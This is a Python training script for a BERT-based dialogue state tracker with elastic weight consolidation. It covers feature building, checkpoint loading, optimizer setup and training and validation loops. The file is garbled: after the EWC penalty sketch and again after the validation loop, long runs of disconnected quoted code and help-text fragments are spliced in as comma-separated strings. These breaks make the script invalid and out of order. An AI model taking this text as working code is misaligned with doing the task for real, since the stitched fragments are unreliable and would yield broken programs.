                                   label_id=[-1] * slot_dim,
                                   prev_label_id=[-1] * prev_slot_dim)] \
                    * (max_turn_length - prev_turn_idx - 1)
    assert len(features) % max_turn_length == 0

    all_input_ids = torch.tensor([f.input_ids for f in features], dtype=torch.long)
    all_input_len = torch.tensor([f.input_len for f in features], dtype=torch.long)
    all_label_ids = torch.tensor([f.label_id for f in features], dtype=torch.long)
    all_prev_label_ids = torch.tensor([f.prev_label_id for f in features], dtype=torch.long)

    # reshape tensors to [batch, turn, word]
    all_input_ids = all_input_ids.view(-1, max_turn_length, max_seq_length)
    all_input_len = all_input_len.view(-1, max_turn_length, 2)
    all_label_ids = all_label_ids.view(-1, max_turn_length, slot_dim)
    all_prev_label_ids = all_prev_label_ids.view(-1, max_turn_length, prev_slot_dim)

    return all_input_ids, all_input_len, all_label_ids, all_prev_label_ids
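# Worked shape example for the tensors returned above, assuming 100 dialogues,
# max_turn_length=22, max_seq_length=64, 10 target slots and 25 previous slots
# (all figures illustrative):
#   all_input_ids       -> [100, 22, 64]
#   all_input_len       -> [100, 22, 2]
#   all_label_ids       -> [100, 22, 10]
#   all_prev_label_ids  -> [100, 22, 25]
# Padded turns carry label id -1, which the training/eval loops below use to
# count only valid turns.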
def get_label_embedding(labels, max_seq_length, tokenizer, device):
    features = []
    for label in labels:
        label_tokens = ["[CLS]"] + tokenizer.tokenize(label) + ["[SEP]"]
        label_token_ids = tokenizer.convert_tokens_to_ids(label_tokens)
        label_len = len(label_token_ids)

        label_padding = [0] * (max_seq_length - len(label_token_ids))
        label_token_ids += label_padding
        assert len(label_token_ids) == max_seq_length
        features.append((label_token_ids, label_len))

    all_label_token_ids = torch.tensor([f[0] for f in features], dtype=torch.long).to(device)
    all_label_len = torch.tensor([f[1] for f in features], dtype=torch.long).to(device)
    return all_label_token_ids, all_label_len


def _truncate_seq_pair(tokens_a, tokens_b, max_length):
    """Truncates a sequence pair in place to the maximum length."""
    while True:
        total_length = len(tokens_a) + len(tokens_b)
        if total_length <= max_length:
            break
        if len(tokens_a) > len(tokens_b):
            tokens_a.pop()
        else:
            tokens_b.pop()


###############################################################################
# Miscellaneous functions
###############################################################################

def accuracy(out, labels):
    outputs = np.argmax(out, axis=1)
    return np.sum(outputs == labels)
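# The EWC class imported inside main() below is not reproduced here; as a point
# of reference, its regularizer has the following shape. This is a minimal
# sketch under assumed attribute names (`fisher` and `star_params` are
# illustrative), not the implementation this script imports.
def _ewc_penalty_sketch(model, fisher, star_params):
    """Return sum_i F_i * (theta_i - theta_i*)^2 over the shared parameters.

    `fisher` maps parameter names to diagonal Fisher estimates computed on the
    previous task; `star_params` holds the parameter values at the end of that
    task. Training then minimizes task_loss + lambda_ewc * penalty.
    """
    penalty = 0.0
    for name, param in model.named_parameters():
        if name in fisher:
            penalty = penalty + (fisher[name] * (param - star_params[name]) ** 2).sum()
    return penalty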
"from apex.parallel import DistributedDataParallel as DDP except ImportError: raise ImportError( \"Please install apex", "(last_update, best_loss, best_acc)) else: logger.info(\"*** Model NOT Updated: Epoch=%d, Validation Loss=%.6f, Validation Acc=%.6f", "0.1 = 10%% of training.\") parser.add_argument(\"--lambda_ewc\", default=0.1, type=float, help=\"Hyper-parameter for EWC\") parser.add_argument(\"--no_cuda\", action='store_true',", "1: loss_, loss_slot, acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id) loss", "class.\"\"\" return [ self.ontology[slot] for slot in self.prev_slot] def _create_examples(self, lines, set_type, accumulation=False):", "vmax=1.0, cbar=False, ax=ax) class_correct = [[0 for x in range(num_labels[i])] for i in", "dev_acc_slot = None, None nb_dev_examples, nb_dev_steps = 0, 0 prev_dev_loss = 0 prev_dev_acc", "all_input_ids, all_input_len, all_label_ids, all_prev_label_ids def get_label_embedding(labels, max_seq_length, tokenizer, device): features = [] for", "== 1: for i, slot in enumerate(processor.target_slot): summary_writer.add_scalar(\"Train/Loss_%s\" % slot.replace(' ','_'), loss_slot[i], global_step)", "args.target_slot=='all': out_file_name += '_all' output_eval_file = os.path.join(args.output_dir, \"%s.txt\" % out_file_name) with open(output_eval_file, \"w\")", "print(\"Slot\", slot) for turn in range(nturn): draw(attn_scores[slot*label_ids.size(1)+turn,:,:].cpu(), tokenizer.convert_ids_to_tokens(input_ids[0][turn].cpu().numpy()), [*range(0, args.attn_head)], ax=axs[turn]) axs[turn].set_title(\"turn %d", "tokenizer, device) model.initialize_slot_value_lookup(label_token_ids, label_len, slot_token_ids, slot_len) if n_gpu > 1: model = torch.nn.DataParallel(model)", "in self.prev_slot_idx: self.prev_slot.append(slot) self.all_slot = self.prev_slot + self.target_slot logger.info('Processor: previous slots: ' +", "'0:1:2 or an excluding slot name 'attraction'\" ) parser.add_argument(\"--prev_slot\", default='', type=str, required=True, help=\"Previous", "config.data_dir == \"data/woz\" or config.data_dir==\"data/woz-turn\": fp_ontology = open(os.path.join(config.data_dir, \"ontology_dstc2_en.json\"), \"r\") ontology = json.load(fp_ontology)", "parser.add_argument('--data_dir', type=str, required=True, help='location of the data corpus') parser.add_argument(\"--bert_model\", default=None, type=str, required=True, help=\"Bert", "steps = %d\", num_dev_steps) all_input_ids_dev, all_input_len_dev, all_label_ids_dev, all_prev_label_ids_dev = \\ all_input_ids_dev.to(device), all_input_len_dev.to(device), all_label_ids_dev.to(device),", "set the label encoder trainable. 
\\n\" \"This option is valid only when using", "class.\"\"\" return self._create_examples( self._read_tsv(os.path.join(data_dir, \"train.tsv\")), \"train\", accumulation) def get_dev_examples(self, data_dir, accumulation=False): \"\"\"See base", "/ nb_tr_steps if args.do_train else None result = {'eval_loss': eval_loss, 'eval_accuracy': eval_accuracy, 'loss':", "all_label_ids = convert_examples_to_features( eval_examples, label_list, args.max_seq_length, tokenizer, args.max_turn_length) all_input_ids, all_input_len, all_label_ids = all_input_ids.to(device),", "max_turn_length, max_seq_length) all_input_len = all_input_len.view(-1, max_turn_length, 2) all_label_ids = all_label_ids.view(-1, max_turn_length, slot_dim) all_prev_label_ids", "# Tensorboard logging if not args.do_not_use_tensorboard: summary_writer = SummaryWriter(\"./%s/%s\" % (args.tf_dir, tb_file_name)) else:", "0 eval_loss_slot, eval_acc_slot = None, None nb_eval_steps, nb_eval_examples = 0, 0 prev_eval_loss, prev_eval_accuracy", "l * num_valid_turn dev_acc_slot += acc_slot * num_valid_turn for i, l in enumerate(prev_loss_slot):", "else: prev_slot.append(value) config.target_slot = ':'.join(target_slot) config.prev_slot = ':'.join(prev_slot) else: raise NotImplementedError() # sorting", "try: from apex.optimizers import FP16_Optimizer from apex.optimizers import FusedAdam except ImportError: raise ImportError(", "0, 0 for step, batch in enumerate(tqdm(train_dataloader, desc=\"Iteration\")): batch = tuple(t.to(device) for t", "if torch.cuda.is_available() and not args.no_cuda else \"cpu\") n_gpu = torch.cuda.device_count() else: torch.cuda.set_device(args.local_rank) device", "= 0 prev_dev_acc = 0 prev_dev_loss_slot, prev_dev_acc_slot = None, None prev_nb_dev_examples = 0", "= processor.get_test_examples(args.data_dir, accumulation=accumulation) all_input_ids, all_input_len, all_label_ids, all_prev_label_ids = convert_examples_to_features( eval_examples, target_label_list, prev_label_list, args.max_seq_length,", "ontology_items = list(self.ontology.items()) for idx, domain in enumerate(ontology_items): slot, value = domain if", "data file into a list of `InputBatch`s.\"\"\" slot_dim = len(label_list) prev_slot_dim = len(prev_label_list)", "' % (label, label_map[i][label]) return label_id, label_info features = [] prev_dialogue_idx = None", "if prev_turn_idx < max_turn_length: features += [InputFeatures(input_ids=all_padding, input_len=all_padding_len, label_id=[-1]*slot_dim, prev_label_id=[-1]*prev_slot_dim)] * (max_turn_length -", "tracker\") parser.add_argument('--num_rnn_layers', type=int, default=1, help=\"number of RNN layers\") parser.add_argument('--zero_init_rnn', action='store_true', help=\"set initial hidden", "all_input_ids, all_input_len, all_label_ids = convert_examples_to_features( eval_examples, label_list, args.max_seq_length, tokenizer, args.max_turn_length) all_input_ids, all_input_len, all_label_ids", "default='/gfs/nlp/.pytorch_pretrained_bert', type=str, required=False, help=\"The directory of the pretrained BERT model\") parser.add_argument(\"--task_name\", default=None, type=str,", "n_gpu = torch.cuda.device_count() else: torch.cuda.set_device(args.local_rank) device = torch.device(\"cuda\", args.local_rank) n_gpu = 1 #", "summary_writer.add_scalar(\"Validate/Loss\", dev_loss, global_step) summary_writer.add_scalar(\"Validate/Acc\", dev_acc, global_step) summary_writer.add_scalar(\"Validate/Prev_Loss\", prev_dev_loss, global_step) summary_writer.add_scalar(\"Validate/Prev_Acc\", prev_dev_acc, 
    # Tensorboard logging
    tb_file_name = args.output_dir.split('/')[1]  # experiment name taken from the output path
    if not args.do_not_use_tensorboard:
        summary_writer = SummaryWriter("./%s/%s" % (args.tf_dir, tb_file_name))
    else:
        summary_writer = None

    fileHandler = logging.FileHandler(os.path.join(args.output_dir, "%s.txt" % (tb_file_name)))
    logger.addHandler(fileHandler)
    logger.info(args)

    # CUDA setting
    if args.local_rank == -1 or args.no_cuda:
        device = torch.device("cuda" if torch.cuda.is_available() and not args.no_cuda else "cpu")
        n_gpu = torch.cuda.device_count()
    else:
        torch.cuda.set_device(args.local_rank)
        device = torch.device("cuda", args.local_rank)
        n_gpu = 1
        # Initializes the distributed backend which will take care of sychronizing nodes/GPUs
        torch.distributed.init_process_group(backend='nccl')
    logger.info("device: {} n_gpu: {}, distributed training: {}, 16-bits training: {}".format(
        device, n_gpu, bool(args.local_rank != -1), args.fp16))

    if args.gradient_accumulation_steps < 1:
        raise ValueError("Invalid gradient_accumulation_steps parameter: {}, should be >= 1".format(
            args.gradient_accumulation_steps))

    args.train_batch_size = int(args.train_batch_size / args.gradient_accumulation_steps)

    # Set the random seed manually for reproducibility.
    random.seed(args.seed)
    np.random.seed(args.seed)
    torch.manual_seed(args.seed)
    if n_gpu > 0:
        torch.cuda.manual_seed_all(args.seed)

    if not args.do_train and not args.do_eval and not args.do_analyze:
        raise ValueError("At least one of `do_train` or `do_eval` must be True.")
    ###############################################################################
    # Load data
    ###############################################################################

    # Get Processor
    processor = Processor(args)
    prev_label_list = processor.get_prev_labels()        # Slot value labels of Previous task
    target_label_list = processor.get_labels()           # Slot value labels of Present task
    label_list = prev_label_list + target_label_list     # All slot value labels
    num_labels = [len(labels) for labels in label_list]  # Number of labels of all slots

    #prev_slot_id = processor.prev_slot_idx
    #target_slot_id = processor.target_slot_idx # wrong
    prev_slot_id = list(range(0, len(processor.prev_slot)))                          # List of slots in previous task
    target_slot_id = list(range(len(processor.prev_slot), len(processor.all_slot)))  # list of slots in present task

    # tokenizer
    vocab_dir = os.path.join(args.bert_dir, '%s-vocab.txt' % args.bert_model)
    if not os.path.exists(vocab_dir):
        raise ValueError("Can't find %s " % vocab_dir)
    tokenizer = BertTokenizer.from_pretrained(vocab_dir, do_lower_case=args.do_lower_case)

    num_train_steps = None
    accumulation = False

    if args.do_train:
        train_examples = processor.get_train_examples(args.data_dir, accumulation=accumulation)
        dev_examples = processor.get_dev_examples(args.data_dir, accumulation=accumulation)
        num_train_steps = int(len(train_examples) / args.train_batch_size * args.num_train_epochs)
        num_dev_steps = int(len(dev_examples) / args.dev_batch_size * args.num_train_epochs)

        ## Train: utterances
        all_input_ids, all_input_len, all_label_ids, all_prev_label_ids = convert_examples_to_features(
            train_examples, target_label_list, prev_label_list, args.max_seq_length, tokenizer, args.max_turn_length)
        logger.info("***** Running training *****")
        logger.info("  Num examples = %d", len(train_examples))
        logger.info("  Batch size = %d", args.train_batch_size)
        logger.info("  Num steps = %d", num_train_steps)

        all_input_ids, all_input_len, all_label_ids, all_prev_label_ids = \
            all_input_ids.to(device), all_input_len.to(device), all_label_ids.to(device), all_prev_label_ids.to(device)

        train_data = TensorDataset(all_input_ids, all_input_len, all_label_ids, all_prev_label_ids)
        if args.local_rank == -1:
            train_sampler = RandomSampler(train_data)
        else:
            train_sampler = DistributedSampler(train_data)
        train_dataloader = DataLoader(train_data, sampler=train_sampler, batch_size=args.train_batch_size)

        ## Dev: utterances
        all_input_ids_dev, all_input_len_dev, all_label_ids_dev, all_prev_label_ids_dev = convert_examples_to_features(
            dev_examples, target_label_list, prev_label_list, args.max_seq_length, tokenizer, args.max_turn_length)
        logger.info("***** Running validation *****")
        logger.info("  Num examples = %d", len(dev_examples))
        logger.info("  Batch size = %d", args.dev_batch_size)
        logger.info("  Num steps = %d", num_dev_steps)

        all_input_ids_dev, all_input_len_dev, all_label_ids_dev, all_prev_label_ids_dev = \
            all_input_ids_dev.to(device), all_input_len_dev.to(device), \
            all_label_ids_dev.to(device), all_prev_label_ids_dev.to(device)

        dev_data = TensorDataset(all_input_ids_dev, all_input_len_dev, all_label_ids_dev, all_prev_label_ids_dev)
        dev_sampler = SequentialSampler(dev_data)
        dev_dataloader = DataLoader(dev_data, sampler=dev_sampler, batch_size=args.dev_batch_size)

    logger.info("Loaded data!")
    ###############################################################################
    # Build the models
    ###############################################################################

    # Prepare model
    if args.nbt == 'rnn':
        from BeliefTrackerSlotQueryMultiSlot import BeliefTracker
        if args.task_name.find("gru") == -1 and args.task_name.find("lstm") == -1:
            raise ValueError("Task name should include at least \"gru\" or \"lstm\"")
    elif args.nbt == 'transformer':
        from BeliefTrackerSlotQueryMultiSlotTransformer import BeliefTracker
    else:
        raise ValueError('nbt type should be either rnn or transformer')
    from BeliefTrackerSlotQueryMultiSlotEWC import EWC

    model = BeliefTracker(args, num_labels, device)
    if args.fp16:
        model.half()
    model.to(device)

    # Load pretrained model
    # in the case that slot and values are different between the training and evaluation
    ptr_model = torch.load(args.load_path, map_location=device)

    del_list = []
    rename_list = []
    for key in ptr_model.keys():
        if ('slot_lookup' in key) or ('value_lookup' in key):  # remove slot_lookup and value_lookup
            del_list.append(key)
        if ('rnn.' in key):  # rename rnn -> nbt
            rename_list.append(key)

    for key in del_list:
        del ptr_model[key]
    for key in rename_list:
        new_key = key.replace('rnn.', 'nbt.')
        ptr_model[new_key] = ptr_model[key]
        del ptr_model[key]

    state = model.state_dict()
    state.update(ptr_model)
    model.load_state_dict(state)
    model.to(device)

    ## Get slot-value embeddings
    label_token_ids, label_len = [], []
    for labels in label_list:
        token_ids, lens = get_label_embedding(labels, args.max_label_length, tokenizer, device)
        label_token_ids.append(token_ids)
        label_len.append(lens)

    ## Get slot-type embeddings
    ## Note: slot embeddings are ordered as [previous slots + present target slots]
    slot_token_ids, slot_len = get_label_embedding(processor.all_slot, args.max_label_length, tokenizer, device)

    model.initialize_slot_value_lookup(label_token_ids, label_len, slot_token_ids, slot_len)

    if args.local_rank != -1:
        try:
            from apex.parallel import DistributedDataParallel as DDP
        except ImportError:
            raise ImportError("Please install apex from https://www.github.com/nvidia/apex "
                              "to use distributed and fp16 training.")
        model = DDP(model)
    elif n_gpu > 1:
        model = torch.nn.DataParallel(model)
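    # Example of the checkpoint surgery above (key names illustrative): an entry
    # such as 'rnn.weight_ih_l0' is re-registered as 'nbt.weight_ih_l0', while
    # 'slot_lookup.weight' / 'value_lookup.weight' are dropped entirely so the
    # lookup tables can be rebuilt for the current task's ontology sizes.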
    # Prepare optimizer
    if args.do_train:
        def get_optimizer_grouped_parameters(model):
            param_optimizer = [(n, p) for n, p in model.named_parameters() if p.requires_grad]
            no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']
            # Exclude biases and LayerNorm parameters from weight decay.
            optimizer_grouped_parameters = [
                {'params': [p for n, p in param_optimizer if not any(nd in n for nd in no_decay)],
                 'weight_decay': 0.01, 'lr': args.learning_rate},
                {'params': [p for n, p in param_optimizer if any(nd in n for nd in no_decay)],
                 'weight_decay': 0.0, 'lr': args.learning_rate},
            ]
            return optimizer_grouped_parameters

        if n_gpu == 1:
            optimizer_grouped_parameters = get_optimizer_grouped_parameters(model)
        else:
            optimizer_grouped_parameters = get_optimizer_grouped_parameters(model.module)

        t_total = num_train_steps
        if args.local_rank != -1:
            t_total = t_total // torch.distributed.get_world_size()

        if args.fp16:
            try:
                from apex.optimizers import FP16_Optimizer
                from apex.optimizers import FusedAdam
            except ImportError:
                raise ImportError("Please install apex from https://www.github.com/nvidia/apex "
                                  "to use distributed and fp16 training.")
            optimizer = FusedAdam(optimizer_grouped_parameters,
                                  lr=args.learning_rate,
                                  bias_correction=False,
                                  max_grad_norm=1.0)
            if args.loss_scale == 0:
                optimizer = FP16_Optimizer(optimizer, dynamic_loss_scale=True)
            else:
                optimizer = FP16_Optimizer(optimizer, static_loss_scale=args.loss_scale)
        else:
            optimizer = BertAdam(optimizer_grouped_parameters,
                                 lr=args.learning_rate,
                                 warmup=args.warmup_proportion,
                                 t_total=t_total)
        logger.info(optimizer)
    ###############################################################################
    # Training code
    ###############################################################################

    if args.do_train:
        logger.info("Training...")

        global_step = 0
        last_update = None
        best_loss = None

        #### EWC: calculate the Fisher information on the previous tasks
        ewc = EWC(model, dev_dataloader, device=device, n_gpu=n_gpu)

        for epoch in trange(int(args.num_train_epochs), desc="Epoch"):
            #### TRAIN
            model.train()
            tr_loss = 0
            nb_tr_examples, nb_tr_steps = 0, 0

            for step, batch in enumerate(tqdm(train_dataloader, desc="Iteration")):
                batch = tuple(t.to(device) for t in batch)
                input_ids, input_len, label_ids, prev_label_ids = batch
                if input_ids.dim() == 2:
                    input_ids = input_ids.unsqueeze(0)
                    input_len = input_len.unsqueeze(0)
                    label_ids = label_ids.unsqueeze(0)
                    prev_label_ids = prev_label_ids.unsqueeze(0)

                # Task loss on the target slots plus the EWC penalty on the
                # parameters shared with previous tasks (see _ewc_penalty_sketch above).
                if n_gpu == 1:
                    loss_, loss_slot, acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu,
                                                               target_slot=target_slot_id)
                    loss_ewc = ewc.penalty(model)
                    loss = loss_ + args.lambda_ewc * loss_ewc
                else:
                    loss_, _, acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu,
                                                       target_slot=target_slot_id)
                    loss_ = loss_.mean()
                    acc = acc.mean()
                    acc_slot = acc_slot.mean(0)
                    loss_ewc = ewc.penalty(model)
                    loss = loss_ + args.lambda_ewc * loss_ewc

                if args.gradient_accumulation_steps > 1:
                    loss = loss / args.gradient_accumulation_steps

                if args.fp16:
                    optimizer.backward(loss)
                else:
                    loss.backward()

                if summary_writer is not None:
                    summary_writer.add_scalar("Epoch", epoch, global_step)
                    summary_writer.add_scalar("Train/Loss_Total", loss, global_step)
                    summary_writer.add_scalar("Train/JointAcc", acc, global_step)
                    if n_gpu == 1:
                        for i, slot in enumerate(processor.target_slot):
                            summary_writer.add_scalar("Train/Loss_%s" % slot.replace(' ', '_'),
                                                      loss_slot[i], global_step)
                            summary_writer.add_scalar("Train/Acc_%s" % slot.replace(' ', '_'),
                                                      acc_slot[i], global_step)

                tr_loss += loss.item()
                nb_tr_examples += input_ids.size(0)
                nb_tr_steps += 1
                if (step + 1) % args.gradient_accumulation_steps == 0:
                    # modify learning rate with special warm up BERT uses
                    lr_this_step = args.learning_rate * warmup_linear(global_step / t_total,
                                                                      args.warmup_proportion)
                    if summary_writer is not None:
                        summary_writer.add_scalar("Train/LearningRate", lr_this_step, global_step)
                    for param_group in optimizer.param_groups:
                        param_group['lr'] = lr_this_step
                    optimizer.step()
                    optimizer.zero_grad()
                    global_step += 1
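            # For reference, warmup_linear from pytorch_pretrained_bert behaves
            # roughly as follows (x = global_step / t_total):
            #   x < warmup  ->  x / warmup   (linear ramp-up)
            #   otherwise   ->  1.0 - x      (linear decay)
            # so the LR peaks at args.learning_rate once the warmup fraction of
            # training has passed.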
            # Perform evaluation on validation dataset
            model.eval()
            dev_loss = 0
            dev_acc = 0
            dev_loss_slot, dev_acc_slot = None, None
            nb_dev_examples, nb_dev_steps = 0, 0
            prev_dev_loss = 0
            prev_dev_acc = 0
            prev_dev_loss_slot, prev_dev_acc_slot = None, None
            prev_nb_dev_examples = 0

            for step, batch in enumerate(tqdm(dev_dataloader, desc="Validation")):
                batch = tuple(t.to(device) for t in batch)
                input_ids, input_len, label_ids, prev_label_ids = batch
                if input_ids.dim() == 2:
                    input_ids = input_ids.unsqueeze(0)
                    input_len = input_len.unsqueeze(0)
                    label_ids = label_ids.unsqueeze(0)
                    prev_label_ids = prev_label_ids.unsqueeze(0)

                with torch.no_grad():
                    if n_gpu == 1:
                        loss, loss_slot, acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu,
                                                                  target_slot=target_slot_id)
                        prev_loss, prev_loss_slot, prev_acc, prev_acc_slot, _ = \
                            model(input_ids, input_len, prev_label_ids, n_gpu, target_slot=prev_slot_id)
                    else:
                        loss, _, acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu,
                                                          target_slot=target_slot_id)
                        loss = loss.mean()
                        acc = acc.mean()
                        acc_slot = acc_slot.mean(0)
                        prev_loss, _, prev_acc, prev_acc_slot, _ = \
                            model(input_ids, input_len, prev_label_ids, n_gpu, target_slot=prev_slot_id)
                        prev_loss = prev_loss.mean()
                        prev_acc = prev_acc.mean()
                        prev_acc_slot = prev_acc_slot.mean(0)

                num_valid_turn = torch.sum(label_ids[:, :, 0].view(-1) > -1, 0).item()
                dev_loss += loss.item() * num_valid_turn
                dev_acc += acc.item() * num_valid_turn

                prev_num_valid_turn = torch.sum(prev_label_ids[:, :, 0].view(-1) > -1, 0).item()
                prev_dev_loss += prev_loss.item() * prev_num_valid_turn
                prev_dev_acc += prev_acc.item() * prev_num_valid_turn

                if n_gpu == 1:
                    if dev_loss_slot is None:
                        dev_loss_slot = [l * num_valid_turn for l in loss_slot]
                        dev_acc_slot = acc_slot * num_valid_turn
                        prev_dev_loss_slot = [l * prev_num_valid_turn for l in prev_loss_slot]
                        prev_dev_acc_slot = prev_acc_slot * prev_num_valid_turn
                    else:
                        for i, l in enumerate(loss_slot):
                            dev_loss_slot[i] = dev_loss_slot[i] + l * num_valid_turn
                        dev_acc_slot += acc_slot * num_valid_turn
                        for i, l in enumerate(prev_loss_slot):
                            prev_dev_loss_slot[i] = prev_dev_loss_slot[i] + l * prev_num_valid_turn
                        prev_dev_acc_slot += prev_acc_slot * prev_num_valid_turn

                nb_dev_examples += num_valid_turn
                prev_nb_dev_examples += prev_num_valid_turn
raise ValueError(\"Task name should include at least", "for nd in no_decay)], 'weight_decay': 0.0, 'lr': args.learning_rate}, ] return optimizer_grouped_parameters if n_gpu", "= [[0 for x in range(num_labels[i])] for i in range(len(num_labels))] eval_examples = processor.get_test_examples(args.data_dir,", "curr_turn_idx if prev_turn_idx < max_turn_length: features += [InputFeatures(input_ids=all_padding, input_len=all_padding_len, label_id=[-1]*slot_dim, prev_label_id=[-1]*prev_slot_dim)] * (max_turn_length", "= processor.target_slot_idx # wrong prev_slot_id = list(range(0, len(processor.prev_slot))) # List of slots in", "file into a list of `InputBatch`s.\"\"\" slot_dim = len(label_list) prev_slot_dim = len(prev_label_list) def", "or ('value_lookup' in key): # remove slot_lookup and value_lookup del_list.append(key) if ('rnn.' in", "== 0: optimizer = FP16_Optimizer(optimizer, dynamic_loss_scale=True) else: optimizer = FP16_Optimizer(optimizer, static_loss_scale=args.loss_scale) else: optimizer", "sampler=eval_sampler, batch_size=args.eval_batch_size) model.eval() eval_loss, eval_accuracy = 0, 0 eval_loss_slot, eval_acc_slot = None, None", "%s\", key, str(result[key])) writer.write(\"%s = %s\\n\" % (key, str(result[key]))) ############################################################################### # Analyze: TODO", "= None best_loss = None #### EWC: calculate Fisher ewc = EWC(model, dev_dataloader,", "import collections import operator from tqdm import tqdm, trange import numpy as np", "= open(os.path.join(config.data_dir, \"ontology.json\"), \"r\") ontology = json.load(fp_ontology) for slot in ontology.keys(): ontology[slot].append(\"none\") fp_ontology.close()", "prev_loss_slot, prev_acc, prev_acc_slot, _ = model(input_ids, input_len, prev_label_ids, n_gpu, target_slot=prev_slot_id) prev_loss = prev_loss.mean()", "value, -1) ) total_slot_class_acc.append(slot_class_acc/(vid+1)) total_class_acc+=slot_class_acc total_class_acc /= nlabels for sid, slot_acc in enumerate(total_slot_class_acc):", "all_prev_label_ids.to(device) logger.info(\"***** Running evaluation *****\") logger.info(\" Num examples = %d\", len(eval_examples)) logger.info(\" Batch", "prev_dev_loss = prev_dev_loss / prev_nb_dev_examples prev_dev_acc = prev_dev_acc / prev_nb_dev_examples if n_gpu ==", "DataLoader(eval_data, sampler=eval_sampler, batch_size=1) model.eval() none_value_id = [ len(val)-1 for val in label_list] incorrect_dialogs", "if summary_writer is not None: summary_writer.add_scalar(\"Validate/Loss\", dev_loss, global_step) summary_writer.add_scalar(\"Validate/Acc\", dev_acc, global_step) summary_writer.add_scalar(\"Validate/Prev_Loss\", prev_dev_loss,", "parser.add_argument(\"--do_lower_case\", action='store_true', help=\"Set this flag if you are using an uncased model.\") parser.add_argument(\"--set_label_encoder_trainable\",", "from tensorboardX import SummaryWriter import pdb import matplotlib.pyplot as plt import seaborn seaborn.set_context(context=\"talk\")", "+ ', '.join(self.prev_slot)) logger.info('Processor: target slots: '+ ', '.join(self.target_slot)) def get_train_examples(self, data_dir, accumulation=False):", "_get_label(label, label_list): label_id = [] label_info = '' label_map = [{_label: i for", "2: static loss scaling value.\\n\") parser.add_argument(\"--do_not_use_tensorboard\", action='store_true', help=\"Whether to run eval on the", "\"bert-large-uncased, bert-base-cased, bert-large-cased, bert-base-multilingual-uncased, \" \"bert-base-multilingual-cased, bert-base-chinese.\") 
parser.add_argument(\"--bert_dir\", default='/gfs/nlp/.pytorch_pretrained_bert', type=str, required=False, help=\"The directory", "] return optimizer_grouped_parameters if n_gpu == 1: optimizer_grouped_parameters = get_optimizer_grouped_parameters(model) else: optimizer_grouped_parameters =", "help=\"The directory of the pretrained BERT model\") parser.add_argument(\"--task_name\", default=None, type=str, required=True, help=\"The name", "slot_idx.items(): if key == config.target_slot: target_slot.append(value) else: prev_slot.append(value) config.target_slot = ':'.join(target_slot) config.prev_slot =", "type=str, required=True, help=\"Previous trained slots. ex. '0:1:2 or an excluding slot name 'attraction'\"", "for val in eval_loss_slot]), 'eval_acc_slot':'\\t'.join([ str((val).item()) for val in eval_acc_slot]), 'prev_eval_loss': prev_eval_loss, 'prev_eval_accuracy':", "or an excluding slot name 'attraction'\" ) parser.add_argument(\"--prev_slot\", default='', type=str, required=True, help=\"Previous trained", "length. input_ids += [0] * (max_seq_length - len(input_ids)) # Note: padding idx =", "_read_tsv(cls, input_file, quotechar=None): \"\"\"Reads a tab separated value file.\"\"\" with open(input_file, \"r\", encoding='utf-8')", "\"\"\"See base class.\"\"\" return self._create_examples( self._read_tsv(os.path.join(data_dir, \"test.tsv\")), \"test\", accumulation) def get_labels(self): \"\"\"See base", "\" % vocab_dir) tokenizer = BertTokenizer.from_pretrained(vocab_dir, do_lower_case=args.do_lower_case) num_train_steps = None accumulation = False", "type: rnn or transformer or turn\" ) parser.add_argument(\"--fix_utterance_encoder\", action='store_true', help=\"Do not train BERT", "0).item() dev_loss += loss.item() * num_valid_turn dev_acc += acc.item() * num_valid_turn prev_num_valid_turn =", "== 1: torch.save(model.state_dict(), output_model_file) else: torch.save(model.module.state_dict(), output_model_file) last_update = epoch best_loss = dev_loss", "Num examples = %d\", len(eval_examples)) logger.info(\" Batch size = %d\", args.eval_batch_size) eval_data =", "model\") parser.add_argument(\"--task_name\", default=None, type=str, required=True, help=\"The name of the task to train: bert,", "-1 or torch.distributed.get_rank() == 0): pdb.set_trace() def draw(data, x, y, ax): seaborn.heatmap(data, xticklabels=x,", "'do not care' if label=='dontcare' else label def _get_label(label, label_list): label_id = []", "hidden of rnns zero\") parser.add_argument('--skip_connect', type=str, default=False, help=\"skip-connection\") parser.add_argument('--attn_head', type=int, default=4, help=\"the number", "help=\"Whether to run training.\") parser.add_argument(\"--do_eval\", action='store_true', help=\"Whether to run eval on the test", "parser.add_argument(\"--no_cuda\", action='store_true', help=\"Whether not to use CUDA when available\") parser.add_argument(\"--local_rank\", type=int, default=-1, help=\"local_rank", "_ = model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id) loss = loss_ + args.lambda_ewc *", "features], dtype=torch.long) # reshape tensors to [batch, turn, word] all_input_ids = all_input_ids.view(-1, max_turn_length,", "train_examples, target_label_list, prev_label_list, args.max_seq_length, tokenizer, args.max_turn_length) logger.info(\"***** Running training *****\") logger.info(\" Num examples", "args.do_eval and not args.do_analyze: raise ValueError(\"At least one of `do_train` or `do_eval` must", "= %d\", args.train_batch_size) logger.info(\" Num 
steps = %d\", num_train_steps) all_input_ids, all_input_len, all_label_ids, all_prev_label_ids", "if not value == 0: class_acc = class_correct[sid][vid]/value writer.write(\"%s\\t%d\\t%d\\t%.3f\\n\"%(label_list[sid][vid], class_correct[sid][vid], value, class_acc) )", "= int(args.train_batch_size / args.gradient_accumulation_steps) # Set the random seed manually for reproducibility. random.seed(args.seed)", "for vid, value in enumerate(slot): if not value == 0: class_acc = class_correct[sid][vid]/value", "input_len, label_ids in tqdm(eval_dataloader, desc=\"Evaluating\"): if input_ids.dim() == 2: input_ids = input_ids.unsqueeze(0) input_len", "in enumerate(slot): if not value == 0: class_acc = class_correct[sid][vid]/value writer.write(\"%s\\t%d\\t%d\\t%.3f\\n\"%(label_list[sid][vid], class_correct[sid][vid], value,", "best_loss = dev_loss best_acc = dev_acc logger.info(\"*** Model Updated: Epoch=%d, Validation Loss=%.6f, Validation", "batch_size=args.train_batch_size) ## Dev ## utterances all_input_ids_dev, all_input_len_dev, all_label_ids_dev, all_prev_label_ids_dev = convert_examples_to_features( dev_examples, target_label_list,", "*****\") for key in sorted(result.keys()): logger.info(\" %s = %s\", key, str(result[key])) writer.write(\"%s =", "ptr_model[key] if n_gpu > 1: model = model.module state = model.state_dict() state.update(ptr_model) model.load_state_dict(state)", "tokens = [\"[CLS]\"] + tokens_a + [\"[SEP]\"] 